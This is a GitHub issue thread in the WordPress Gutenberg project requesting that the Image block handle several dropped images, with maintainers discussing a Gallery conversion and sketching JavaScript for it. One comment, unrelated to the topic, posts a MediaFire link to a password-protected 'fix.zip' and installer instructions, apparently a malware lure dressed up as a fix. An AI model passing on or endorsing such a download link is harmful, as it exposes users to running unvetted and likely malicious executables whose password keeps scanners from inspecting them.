### ISSUE TITLE
Image block: support dropping multiple images

### ISSUE THREAD

**Issue by swissspidy** [WordPress/gutenberg#64795]
## What problem does this address?

If I drop multiple images into a single image block, only the first one is inserted, the other ones are discarded.

This should simply insert multiple image blocks, just like when you drop them into an empty editor

#20315 is related but is about the "Upload" button where you select an image from the media library.

## What is your proposed solution?

Add a new block transform could be added to either insert multiple image blocks or transform the image block into a gallery.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andrewserong** [comment]
Just wondering, in this case would you expect multiple Image blocks to be inserted or for the Image block to be converted to a Gallery block with the dragged blocks inserted as Image block children? 🤔

**Comment by swissspidy** [comment]
Either way works as I can easily transform between the two. I lean towards a gallery though. But UX folks might have more thoughts here :)

**Comment by richtabor** [comment]
> Just wondering, in this case would you expect multiple Image blocks to be inserted or for the Image block to be converted to a Gallery block with the dragged blocks inserted as Image block children? 🤔

If dropped at the same time, I'd expect a gallery as well.

**Comment by ramonjd** [comment]
I optimistically started looking at a `switchToGallery()` function in the Image block when the `media` argument of the `onSelectImage()` callback is an array of media items.

Something like, but not like:

```js
       // The callback from MediaPlaceholder is an array of media items, so stop handling the single image

		const innerBlocks = processedImages.map( ( image ) => {
			return createBlock( 'core/image', {
				id: image.id,
				blob: image.blob,
				url: image.url,
				alt: '',
			} );
		} );

		replaceBlocks(
			clientId,
			createBlock( 'core/gallery', {}, innerBlocks )
		);
```

Logic seems fine and it half works 😄 however I ran out of time to neatly deal with blobs/temporary URLs. I assuming we'd need the full media entity before transforming to the gallery block? I don't know, I was just tooling around.
